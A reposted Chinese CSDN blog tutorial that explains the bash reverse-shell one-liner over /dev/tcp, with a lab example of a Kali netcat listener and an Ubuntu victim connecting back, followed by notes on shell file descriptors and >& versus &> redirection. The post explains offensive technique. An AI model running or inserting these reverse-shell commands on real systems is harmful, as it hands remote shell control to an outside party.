Linux反弹shell命令语句
语句格式
bash -i >& /dev/tcp/[ip]/[port] 0>&1
-
bash -i 打开bash
-
&后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远程,
-
/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
-
0>&1将标准输入重定向至标准输出,由于标准输出定向至远程,标准输入也借此定向到远程。(由于标准错误输出也定向至远程,因此把 0>&1 改为 0>&2 也可以得到一个交互shell)
例如:
受害者:
Ubuntu Linux ------> 192.168.146.128
攻击者:
Kali Linux ------> 192.168.146.129
我们就以最常见的bash为例:
攻击者机器上执行:
nc -lvp 2333
受害者机器上执行:
bash -i >& /dev/tcp/192.168.146.129/2333 0>&1
文件描述符
有三种标准的文件描述符:
- 0 - stdin 标准输入
- 1 - stdout 标准输出
- 2 - stderr 标准错误输出
还可以自己定义文件描述符,可以用于交换输出流。详见:https://unix.stackexchange.com/questions/42728/what-does-31-12-23-do-in-a-script?lq=1
>与>>
">"用于将标准输出重定向至文件。
ls -l > result.txt //结果将在文件中保存而不出现在bash中
">>“和”>"相比的区别在于:>是覆写文件而>>是追加文件。
&与&>
">&"根据后面的参数不同会有不同的结果。
当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
一定注意:要使用>&来进行文件描述符的重定向
我看到很多博文中说>&和&>是一样的,但是查找不出来&>的相关资料,我认为应该是因为&>在一起并不像>&一样是一个标准的表达方式。
下面证明&>与>&并不相同
rm notExist.file1 > result.txt 2>&1
//结果将被保存在result.txt
rm notExist.file1 > result.txt 2&>1
//2与notExist.file1都被认为是要删除的文件
//结果保存在了一个文件1中
作者:jlu16
来源:CSDN
原文:https://blog.csdn.net/jlu16/article/details/78987990
版权声明:本文为博主原创文章,转载请附上博文链接!